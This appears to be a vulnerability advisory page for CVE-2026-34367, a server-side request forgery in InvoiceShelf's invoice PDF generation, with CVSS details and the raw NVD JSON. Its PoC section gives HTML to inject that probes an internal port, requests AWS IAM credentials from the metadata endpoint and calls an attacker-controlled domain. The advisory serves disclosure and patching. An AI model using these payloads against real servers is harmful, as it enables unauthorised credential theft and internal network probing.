Security Vulnerability Report
CVE-2026-34367 CVSS 7.6 HIGH

CVE-2026-34367

Published: 2026-03-31 21:16:30
Last Modified: 2026-04-09 19:31:34

Description

InvoiceShelf is an open-source web & mobile app that helps track expenses, payments and create professional invoices and estimates. Prior to version 2.2.0, a Server-Side Request Forgery (SSRF) vulnerability exists in the Invoice PDF generation module. User-supplied HTML in the invoice Notes field is passed unsanitised to the Dompdf rendering library, which will fetch any remote resources referenced in the markup. This can be triggered via the PDF preview and email delivery endpoints. This issue has been patched in version 2.2.0.

CVSS Details

CVSS Score: 7.6
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:N
Weakness: CWE-918 (Server-Side Request Forgery)

Note: the 7.6 score is the Secondary assessment in the NVD record for this CVE; the record's Primary assessment rates the same vector with Integrity impact High (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N) at 8.7 HIGH.

Configurations (Affected Products)

cpe:2.3:a:invoiceshelf:invoiceshelf:*:*:*:*:*:*:*:* - VULNERABLE
InvoiceShelf < 2.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```html
<!-- PoC for CVE-2026-34367 -->
<!-- Inject this payload into the 'Notes' field of an invoice -->

<!-- 1. Test for internal port scanning (e.g., port 8080) -->
<img src="http://127.0.0.1:8080" />

<!-- 2. Attempt to access AWS metadata (if hosted on AWS) -->
<img src="http://169.254.169.254/latest/meta-data/iam/security-credentials/" />

<!-- 3. Fetch external resource to verify out-of-band connection -->
<img src="http://attacker-controlled-domain.com/cve-2026-34367.jpg" />
```

References

https://github.com/InvoiceShelf/InvoiceShelf/releases/tag/2.2.0 (Product)
https://github.com/InvoiceShelf/InvoiceShelf/security/advisories/GHSA-q9wx-ggwq-mcgh (Exploit, Vendor Advisory)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-34367",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-31T21:16:29.687",
    "lastModified": "2026-04-09T19:31:34.090",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "InvoiceShelf is an open-source web & mobile app that helps track expenses, payments and create professional invoices and estimates. Prior to version 2.2.0, a Server-Side Request Forgery (SSRF) vulnerability exists in the Invoice PDF generation module. User-supplied HTML in the invoice Notes field is passed unsanitised to the Dompdf rendering library, which will fetch any remote resources referenced in the markup. This can be triggered via the PDF preview and email delivery endpoints. This issue has been patched in version 2.2.0."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:N",
            "baseScore": 7.6,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 4.7
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N",
            "baseScore": 8.7,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 5.8
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-918"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:invoiceshelf:invoiceshelf:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "2.2.0",
                "matchCriteriaId": "DF850775-DE65-40B0-9079-B1ABA4F1F4C9"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/InvoiceShelf/InvoiceShelf/releases/tag/2.2.0",
        "source": "[email protected]",
        "tags": ["Product"]
      },
      {
        "url": "https://github.com/InvoiceShelf/InvoiceShelf/security/advisories/GHSA-q9wx-ggwq-mcgh",
        "source": "[email protected]",
        "tags": ["Exploit", "Vendor Advisory"]
      }
    ]
  }
}
```